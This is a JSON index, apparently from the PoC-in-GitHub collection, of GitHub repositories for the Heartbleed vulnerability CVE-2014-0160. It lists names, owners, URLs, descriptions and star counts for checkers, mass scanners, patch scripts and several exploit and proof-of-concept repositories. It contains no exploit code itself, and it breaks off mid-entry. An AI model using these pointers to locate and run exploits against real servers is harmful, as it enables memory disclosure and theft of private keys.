PoC-in-GitHub/2014/CVE-2014-0160.json
2025-01-14 21:33:20 +09:00

2010 lines
No EOL
81 KiB
JSON
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

[
{
"id": 18537678,
"name": "Heartbleed",
"full_name": "FiloSottile\/Heartbleed",
"owner": {
"login": "FiloSottile",
"id": 1225294,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1225294?v=4",
"html_url": "https:\/\/github.com\/FiloSottile",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/FiloSottile\/Heartbleed",
"description": "A checker (site and tool) for CVE-2014-0160",
"fork": false,
"created_at": "2014-04-07T23:03:09Z",
"updated_at": "2025-01-06T17:00:55Z",
"pushed_at": "2021-02-24T09:17:24Z",
"stargazers_count": 2304,
"watchers_count": 2304,
"has_discussions": false,
"forks_count": 461,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 461,
"watchers": 2304,
"score": 0,
"subscribers_count": 117
},
{
"id": 18545207,
"name": "heartbleeder",
"full_name": "titanous\/heartbleeder",
"owner": {
"login": "titanous",
"id": 13026,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13026?v=4",
"html_url": "https:\/\/github.com\/titanous",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/titanous\/heartbleeder",
"description": "OpenSSL CVE-2014-0160 Heartbleed vulnerability test",
"fork": false,
"created_at": "2014-04-08T04:25:23Z",
"updated_at": "2025-01-03T16:50:21Z",
"pushed_at": "2014-05-27T22:32:26Z",
"stargazers_count": 451,
"watchers_count": 451,
"has_discussions": false,
"forks_count": 86,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 86,
"watchers": 451,
"score": 0,
"subscribers_count": 30
},
{
"id": 18551813,
"name": "bleed",
"full_name": "DominikTo\/bleed",
"owner": {
"login": "DominikTo",
"id": 1384635,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1384635?v=4",
"html_url": "https:\/\/github.com\/DominikTo",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/DominikTo\/bleed",
"description": "bleed is a tool to test servers for the 'Heartbleed' vulnerability (CVE-2014-0160).",
"fork": false,
"created_at": "2014-04-08T09:03:01Z",
"updated_at": "2018-10-05T15:36:14Z",
"pushed_at": "2014-04-17T13:29:34Z",
"stargazers_count": 7,
"watchers_count": 7,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 7,
"score": 0,
"subscribers_count": 3
},
{
"id": 18551976,
"name": "heartthreader",
"full_name": "cyphar\/heartthreader",
"owner": {
"login": "cyphar",
"id": 2888411,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2888411?v=4",
"html_url": "https:\/\/github.com\/cyphar",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/cyphar\/heartthreader",
"description": "Mass, multithreaded testing for servers against Heartbleed (CVE-2014-0160).",
"fork": false,
"created_at": "2014-04-08T09:08:52Z",
"updated_at": "2023-01-28T21:18:39Z",
"pushed_at": "2014-05-29T11:38:13Z",
"stargazers_count": 2,
"watchers_count": 2,
"has_discussions": false,
"forks_count": 2,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 2,
"watchers": 2,
"score": 0,
"subscribers_count": 3
},
{
"id": 18552299,
"name": "patch-openssl-CVE-2014-0160",
"full_name": "jdauphant\/patch-openssl-CVE-2014-0160",
"owner": {
"login": "jdauphant",
"id": 1238254,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1238254?v=4",
"html_url": "https:\/\/github.com\/jdauphant",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/jdauphant\/patch-openssl-CVE-2014-0160",
"description": "Patch openssl #heartbleed with ansible ",
"fork": false,
"created_at": "2014-04-08T09:19:49Z",
"updated_at": "2023-12-24T08:31:41Z",
"pushed_at": "2014-12-02T12:20:51Z",
"stargazers_count": 19,
"watchers_count": 19,
"has_discussions": false,
"forks_count": 8,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 8,
"watchers": 19,
"score": 0,
"subscribers_count": 1
},
{
"id": 18553786,
"name": "heartbleed-masstest",
"full_name": "musalbas\/heartbleed-masstest",
"owner": {
"login": "musalbas",
"id": 5038597,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5038597?v=4",
"html_url": "https:\/\/github.com\/musalbas",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/musalbas\/heartbleed-masstest",
"description": "Multi-threaded tool for scanning many hosts for CVE-2014-0160.",
"fork": false,
"created_at": "2014-04-08T10:10:43Z",
"updated_at": "2025-01-03T16:50:42Z",
"pushed_at": "2015-07-02T14:47:31Z",
"stargazers_count": 573,
"watchers_count": 573,
"has_discussions": false,
"forks_count": 212,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 212,
"watchers": 573,
"score": 0,
"subscribers_count": 57
},
{
"id": 18561166,
"name": "CVE-2014-0160-Scanner",
"full_name": "obayesshelton\/CVE-2014-0160-Scanner",
"owner": {
"login": "obayesshelton",
"id": 628720,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/628720?v=4",
"html_url": "https:\/\/github.com\/obayesshelton",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/obayesshelton\/CVE-2014-0160-Scanner",
"description": null,
"fork": false,
"created_at": "2014-04-08T14:22:36Z",
"updated_at": "2014-04-10T14:04:12Z",
"pushed_at": "2014-04-10T14:04:12Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 0,
"score": 0,
"subscribers_count": 3
},
{
"id": 18566360,
"name": "pacemaker",
"full_name": "Lekensteyn\/pacemaker",
"owner": {
"login": "Lekensteyn",
"id": 164530,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164530?v=4",
"html_url": "https:\/\/github.com\/Lekensteyn",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/Lekensteyn\/pacemaker",
"description": "Heartbleed (CVE-2014-0160) client exploit",
"fork": false,
"created_at": "2014-04-08T16:41:51Z",
"updated_at": "2025-01-14T11:05:31Z",
"pushed_at": "2016-01-22T00:42:35Z",
"stargazers_count": 321,
"watchers_count": 321,
"has_discussions": false,
"forks_count": 78,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 78,
"watchers": 321,
"score": 0,
"subscribers_count": 32
},
{
"id": 18574769,
"name": "openmagic",
"full_name": "isgroup\/openmagic",
"owner": {
"login": "isgroup",
"id": 8706498,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8706498?v=4",
"html_url": "https:\/\/github.com\/isgroup",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/isgroup\/openmagic",
"description": "OpenSSL TLS heartbeat read overrun (CVE-2014-0160)",
"fork": false,
"created_at": "2014-04-08T20:58:26Z",
"updated_at": "2024-03-28T09:37:17Z",
"pushed_at": "2014-04-11T02:40:46Z",
"stargazers_count": 39,
"watchers_count": 39,
"has_discussions": false,
"forks_count": 8,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 8,
"watchers": 39,
"score": 0,
"subscribers_count": 3
},
{
"id": 18577198,
"name": "CVE-2014-0160",
"full_name": "fb1h2s\/CVE-2014-0160",
"owner": {
"login": "fb1h2s",
"id": 2658510,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2658510?v=4",
"html_url": "https:\/\/github.com\/fb1h2s",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/fb1h2s\/CVE-2014-0160",
"description": "openssl Heart Bleed Exploit: CVE-2014-0160 Mass Security Auditor",
"fork": false,
"created_at": "2014-04-08T22:29:55Z",
"updated_at": "2014-04-08T22:29:55Z",
"pushed_at": "2014-04-08T22:29:55Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 0,
"score": 0,
"subscribers_count": 1
},
{
"id": 18578735,
"name": "ssl-heartbleed.nse",
"full_name": "takeshixx\/ssl-heartbleed.nse",
"owner": {
"login": "takeshixx",
"id": 5837896,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837896?v=4",
"html_url": "https:\/\/github.com\/takeshixx",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/takeshixx\/ssl-heartbleed.nse",
"description": "Nmap NSE script that discovers\/exploits Heartbleed\/CVE-2014-0160",
"fork": false,
"created_at": "2014-04-08T23:39:17Z",
"updated_at": "2023-01-28T12:15:52Z",
"pushed_at": "2014-04-13T11:10:34Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 0,
"score": 0,
"subscribers_count": 3
},
{
"id": 18580081,
"name": "heartbleedchecker-chrome",
"full_name": "roganartu\/heartbleedchecker-chrome",
"owner": {
"login": "roganartu",
"id": 1133705,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1133705?v=4",
"html_url": "https:\/\/github.com\/roganartu",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/roganartu\/heartbleedchecker-chrome",
"description": "Chrome extension that automatically checks visited sites for vulnerability to OpenSSL CVE-2014-0160",
"fork": false,
"created_at": "2014-04-09T00:41:04Z",
"updated_at": "2014-04-09T01:05:21Z",
"pushed_at": "2014-04-09T01:05:20Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 0,
"score": 0,
"subscribers_count": 2
},
{
"id": 18586339,
"name": "heartbleed",
"full_name": "zouguangxian\/heartbleed",
"owner": {
"login": "zouguangxian",
"id": 863281,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/863281?v=4",
"html_url": "https:\/\/github.com\/zouguangxian",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/zouguangxian\/heartbleed",
"description": "Checks for vulnerabilities: CVE-2014-0160 ",
"fork": false,
"created_at": "2014-04-09T05:29:36Z",
"updated_at": "2024-06-18T13:57:13Z",
"pushed_at": "2014-04-10T01:49:59Z",
"stargazers_count": 2,
"watchers_count": 2,
"has_discussions": false,
"forks_count": 2,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 2,
"watchers": 2,
"score": 0,
"subscribers_count": 1
},
{
"id": 18603489,
"name": "heartbleed-poc",
"full_name": "sensepost\/heartbleed-poc",
"owner": {
"login": "sensepost",
"id": 1193973,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1193973?v=4",
"html_url": "https:\/\/github.com\/sensepost",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/sensepost\/heartbleed-poc",
"description": "Test for SSL heartbeat vulnerability (CVE-2014-0160)",
"fork": false,
"created_at": "2014-04-09T15:59:14Z",
"updated_at": "2024-09-07T09:56:34Z",
"pushed_at": "2014-07-10T21:17:22Z",
"stargazers_count": 159,
"watchers_count": 159,
"has_discussions": false,
"forks_count": 83,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 83,
"watchers": 159,
"score": 0,
"subscribers_count": 7
},
{
"id": 18613807,
"name": "heartbleed-extention",
"full_name": "proactiveRISK\/heartbleed-extention",
"owner": {
"login": "proactiveRISK",
"id": 7243071,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7243071?v=4",
"html_url": "https:\/\/github.com\/proactiveRISK",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/proactiveRISK\/heartbleed-extention",
"description": "A firefox extension and checker for CVE-2014-0160",
"fork": false,
"created_at": "2014-04-09T21:20:56Z",
"updated_at": "2015-03-07T23:34:52Z",
"pushed_at": "2014-04-11T15:34:20Z",
"stargazers_count": 1,
"watchers_count": 1,
"has_discussions": false,
"forks_count": 1,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 1,
"watchers": 1,
"score": 0,
"subscribers_count": 2
},
{
"id": 18621109,
"name": "coronary",
"full_name": "amerine\/coronary",
"owner": {
"login": "amerine",
"id": 1016,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1016?v=4",
"html_url": "https:\/\/github.com\/amerine",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/amerine\/coronary",
"description": "Test CIDR blocks for CVE-2014-0160\/Heartbleed",
"fork": false,
"created_at": "2014-04-10T02:28:05Z",
"updated_at": "2023-11-20T04:54:55Z",
"pushed_at": "2014-04-10T02:41:44Z",
"stargazers_count": 2,
"watchers_count": 2,
"has_discussions": false,
"forks_count": 1,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 1,
"watchers": 2,
"score": 0,
"subscribers_count": 3
},
{
"id": 18621604,
"name": "CVE-2014-0160",
"full_name": "0x90\/CVE-2014-0160",
"owner": {
"login": "0x90",
"id": 806042,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/806042?v=4",
"html_url": "https:\/\/github.com\/0x90",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/0x90\/CVE-2014-0160",
"description": "Heartbleed variants",
"fork": false,
"created_at": "2014-04-10T02:47:43Z",
"updated_at": "2019-05-15T09:18:49Z",
"pushed_at": "2014-05-09T15:51:53Z",
"stargazers_count": 6,
"watchers_count": 6,
"has_discussions": false,
"forks_count": 13,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 13,
"watchers": 6,
"score": 0,
"subscribers_count": 8
},
{
"id": 18623918,
"name": "CVE-2014-0160",
"full_name": "ice-security88\/CVE-2014-0160",
"owner": {
"login": "ice-security88",
"id": 7246782,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7246782?v=4",
"html_url": "https:\/\/github.com\/ice-security88",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/ice-security88\/CVE-2014-0160",
"description": null,
"fork": false,
"created_at": "2014-04-10T04:27:10Z",
"updated_at": "2014-04-10T04:27:10Z",
"pushed_at": "2014-04-10T04:27:10Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 0,
"score": 0,
"subscribers_count": 2
},
{
"id": 18634299,
"name": "HeartBleed-Vulnerability-Checker",
"full_name": "waqasjamal-zz\/HeartBleed-Vulnerability-Checker",
"owner": {
"login": "waqasjamal-zz",
"id": 2502430,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2502430?v=4",
"html_url": "https:\/\/github.com\/waqasjamal-zz",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/waqasjamal-zz\/HeartBleed-Vulnerability-Checker",
"description": "This repo contains a script to automatically test sites for vulnerability to the Heartbleed Bug (CVE-2014-0160) based on the input file for the urls.",
"fork": false,
"created_at": "2014-04-10T11:42:33Z",
"updated_at": "2014-04-11T11:41:14Z",
"pushed_at": "2014-04-11T11:41:17Z",
"stargazers_count": 1,
"watchers_count": 1,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 1,
"score": 0,
"subscribers_count": 1
},
{
"id": 18644790,
"name": "knockbleed",
"full_name": "siddolo\/knockbleed",
"owner": {
"login": "siddolo",
"id": 2439981,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2439981?v=4",
"html_url": "https:\/\/github.com\/siddolo",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/siddolo\/knockbleed",
"description": "CVE-2014-0160 mass test against subdomains",
"fork": false,
"created_at": "2014-04-10T17:12:53Z",
"updated_at": "2014-04-10T17:48:36Z",
"pushed_at": "2014-04-10T17:48:39Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 0,
"score": 0,
"subscribers_count": 3
},
{
"id": 18649488,
"name": "openssl-heartbleed-fix",
"full_name": "sammyfung\/openssl-heartbleed-fix",
"owner": {
"login": "sammyfung",
"id": 50470,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50470?v=4",
"html_url": "https:\/\/github.com\/sammyfung",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/sammyfung\/openssl-heartbleed-fix",
"description": "OpenSSL Heartbleed (CVE-2014-0160) Fix script",
"fork": false,
"created_at": "2014-04-10T19:47:42Z",
"updated_at": "2014-06-11T14:34:33Z",
"pushed_at": "2014-04-10T20:11:58Z",
"stargazers_count": 1,
"watchers_count": 1,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 1,
"score": 0,
"subscribers_count": 2
},
{
"id": 18676804,
"name": "heartbleed-test",
"full_name": "a0726h77\/heartbleed-test",
"owner": {
"login": "a0726h77",
"id": 127018,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127018?v=4",
"html_url": "https:\/\/github.com\/a0726h77",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/a0726h77\/heartbleed-test",
"description": "CVE-2014-0160 scanner",
"fork": false,
"created_at": "2014-04-11T14:24:54Z",
"updated_at": "2014-04-12T13:29:50Z",
"pushed_at": "2014-04-12T13:29:53Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 0,
"score": 0,
"subscribers_count": 2
},
{
"id": 18685640,
"name": "aws-suture",
"full_name": "pblittle\/aws-suture",
"owner": {
"login": "pblittle",
"id": 21940,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21940?v=4",
"html_url": "https:\/\/github.com\/pblittle",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/pblittle\/aws-suture",
"description": "OpenSSL Heartbleed (CVE-2014-0160) vulnerability scanner.",
"fork": false,
"created_at": "2014-04-11T19:12:11Z",
"updated_at": "2024-03-22T13:15:47Z",
"pushed_at": "2014-09-25T16:00:36Z",
"stargazers_count": 2,
"watchers_count": 2,
"has_discussions": false,
"forks_count": 1,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [
"heartbleed",
"openssl",
"vulnerability-detection"
],
"visibility": "public",
"forks": 1,
"watchers": 2,
"score": 0,
"subscribers_count": 2
},
{
"id": 18705580,
"name": "heartbleed-dtls",
"full_name": "hreese\/heartbleed-dtls",
"owner": {
"login": "hreese",
"id": 892400,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/892400?v=4",
"html_url": "https:\/\/github.com\/hreese",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/hreese\/heartbleed-dtls",
"description": "POC for CVE-2014-0160 (Heartbleed) for DTLS",
"fork": false,
"created_at": "2014-04-12T14:13:36Z",
"updated_at": "2022-11-28T16:18:03Z",
"pushed_at": "2016-03-26T12:21:03Z",
"stargazers_count": 5,
"watchers_count": 5,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 5,
"score": 0,
"subscribers_count": 3
},
{
"id": 18714630,
"name": "bleeding_onions",
"full_name": "wwwiretap\/bleeding_onions",
"owner": {
"login": "wwwiretap",
"id": 210109,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/210109?v=4",
"html_url": "https:\/\/github.com\/wwwiretap",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/wwwiretap\/bleeding_onions",
"description": "Script to find Exit and Guard nodes in the Tor Network, that are still suffering from CVE-2014-0160",
"fork": false,
"created_at": "2014-04-12T21:04:55Z",
"updated_at": "2014-09-09T17:32:17Z",
"pushed_at": "2014-04-13T14:57:20Z",
"stargazers_count": 6,
"watchers_count": 6,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 6,
"score": 0,
"subscribers_count": 3
},
{
"id": 18722665,
"name": "heatbleeding",
"full_name": "idkqh7\/heatbleeding",
"owner": {
"login": "idkqh7",
"id": 2221840,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2221840?v=4",
"html_url": "https:\/\/github.com\/idkqh7",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/idkqh7\/heatbleeding",
"description": "Test script for test 1Password database for SSL Hea(r)t Bleeding (CVE-2014-0160)",
"fork": false,
"created_at": "2014-04-13T05:52:43Z",
"updated_at": "2018-03-04T07:22:19Z",
"pushed_at": "2014-04-09T16:36:52Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 0,
"score": 0,
"subscribers_count": 2
},
{
"id": 18728436,
"name": "ssl-heartbleed.nse",
"full_name": "GeeksXtreme\/ssl-heartbleed.nse",
"owner": {
"login": "GeeksXtreme",
"id": 5917335,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5917335?v=4",
"html_url": "https:\/\/github.com\/GeeksXtreme",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/GeeksXtreme\/ssl-heartbleed.nse",
"description": "Nmap NSE script that discovers\/exploits Heartbleed\/CVE-2014-0160.",
"fork": false,
"created_at": "2014-04-13T12:14:29Z",
"updated_at": "2024-08-12T19:13:40Z",
"pushed_at": "2014-04-13T11:10:34Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 4,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 4,
"watchers": 0,
"score": 0,
"subscribers_count": 2
},
{
"id": 18737537,
"name": "heartbleed",
"full_name": "xlucas\/heartbleed",
"owner": {
"login": "xlucas",
"id": 2470398,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2470398?v=4",
"html_url": "https:\/\/github.com\/xlucas",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/xlucas\/heartbleed",
"description": "A research tool designed to check for OpenSSL CVE-2014-0160 vulnerability",
"fork": false,
"created_at": "2014-04-13T19:18:32Z",
"updated_at": "2023-01-28T19:55:06Z",
"pushed_at": "2015-05-02T08:25:20Z",
"stargazers_count": 1,
"watchers_count": 1,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 1,
"score": 0,
"subscribers_count": 2
},
{
"id": 18794584,
"name": "-Heartbleed-",
"full_name": "indiw0rm\/-Heartbleed-",
"owner": {
"login": "indiw0rm",
"id": 7300510,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7300510?v=4",
"html_url": "https:\/\/github.com\/indiw0rm",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/indiw0rm\/-Heartbleed-",
"description": "A checker (site and tool) for CVE-2014-0160: ",
"fork": false,
"created_at": "2014-04-15T09:30:40Z",
"updated_at": "2014-04-15T09:30:40Z",
"pushed_at": "2014-04-15T09:30:40Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 0,
"score": 0,
"subscribers_count": 1
},
{
"id": 18802435,
"name": "heartbleed-tools",
"full_name": "einaros\/heartbleed-tools",
"owner": {
"login": "einaros",
"id": 394360,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/394360?v=4",
"html_url": "https:\/\/github.com\/einaros",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/einaros\/heartbleed-tools",
"description": "OpenSSL Heartbleed (CVE-2014-0160) vulnerability scanner, data miner and RSA key-restore tools.",
"fork": false,
"created_at": "2014-04-15T14:09:54Z",
"updated_at": "2024-01-13T15:14:58Z",
"pushed_at": "2014-06-18T11:54:32Z",
"stargazers_count": 98,
"watchers_count": 98,
"has_discussions": false,
"forks_count": 23,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 23,
"watchers": 98,
"score": 0,
"subscribers_count": 5
},
{
"id": 18818122,
"name": "Heartbleed",
"full_name": "mozilla-services\/Heartbleed",
"owner": {
"login": "mozilla-services",
"id": 1066228,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1066228?v=4",
"html_url": "https:\/\/github.com\/mozilla-services",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/mozilla-services\/Heartbleed",
"description": "A checker (site and tool) for CVE-2014-0160",
"fork": false,
"created_at": "2014-04-15T22:22:18Z",
"updated_at": "2023-01-28T18:42:45Z",
"pushed_at": "2019-03-27T19:51:32Z",
"stargazers_count": 3,
"watchers_count": 3,
"has_discussions": false,
"forks_count": 1,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 1,
"watchers": 3,
"score": 0,
"subscribers_count": 5
},
{
"id": 18935164,
"name": "heartbleed.js",
"full_name": "yryz\/heartbleed.js",
"owner": {
"login": "yryz",
"id": 1646732,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1646732?v=4",
"html_url": "https:\/\/github.com\/yryz",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/yryz\/heartbleed.js",
"description": "openssl Heartbleed bug(CVE-2014-0160) check for Node.js ",
"fork": false,
"created_at": "2014-04-19T06:20:44Z",
"updated_at": "2022-10-09T06:01:17Z",
"pushed_at": "2015-04-30T09:25:33Z",
"stargazers_count": 4,
"watchers_count": 4,
"has_discussions": false,
"forks_count": 1,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [
"heartbleed",
"javascript",
"nodejs",
"openssl"
],
"visibility": "public",
"forks": 1,
"watchers": 4,
"score": 0,
"subscribers_count": 2
},
{
"id": 19339521,
"name": "MaltegoHeartbleed",
"full_name": "DisK0nn3cT\/MaltegoHeartbleed",
"owner": {
"login": "DisK0nn3cT",
"id": 727064,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/727064?v=4",
"html_url": "https:\/\/github.com\/DisK0nn3cT",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/DisK0nn3cT\/MaltegoHeartbleed",
"description": "Maltego transform to detect the OpenSSL Heartbleed vulnerability (CVE-2014-0160)",
"fork": false,
"created_at": "2014-05-01T08:28:45Z",
"updated_at": "2024-11-22T21:14:20Z",
"pushed_at": "2014-05-01T08:47:16Z",
"stargazers_count": 18,
"watchers_count": 18,
"has_discussions": false,
"forks_count": 7,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 7,
"watchers": 18,
"score": 0,
"subscribers_count": 6
},
{
"id": 19408970,
"name": "HeartLeak",
"full_name": "OffensivePython\/HeartLeak",
"owner": {
"login": "OffensivePython",
"id": 6576532,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6576532?v=4",
"html_url": "https:\/\/github.com\/OffensivePython",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/OffensivePython\/HeartLeak",
"description": "CVE-2014-0160 (Heartbeat Buffer over-read bug)",
"fork": false,
"created_at": "2014-05-03T18:08:27Z",
"updated_at": "2024-08-12T19:13:48Z",
"pushed_at": "2014-05-03T18:14:49Z",
"stargazers_count": 16,
"watchers_count": 16,
"has_discussions": false,
"forks_count": 10,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 10,
"watchers": 16,
"score": 0,
"subscribers_count": 4
},
{
"id": 25109038,
"name": "ssl_scanner",
"full_name": "vortextube\/ssl_scanner",
"owner": {
"login": "vortextube",
"id": 7092728,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7092728?v=4",
"html_url": "https:\/\/github.com\/vortextube",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/vortextube\/ssl_scanner",
"description": "Heartbleed (CVE-2014-0160) SSLv3 Scanner",
"fork": false,
"created_at": "2014-10-12T05:13:06Z",
"updated_at": "2017-01-18T17:52:53Z",
"pushed_at": "2014-10-12T05:22:07Z",
"stargazers_count": 1,
"watchers_count": 1,
"has_discussions": false,
"forks_count": 1,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 1,
"watchers": 1,
"score": 0,
"subscribers_count": 2
},
{
"id": 31863201,
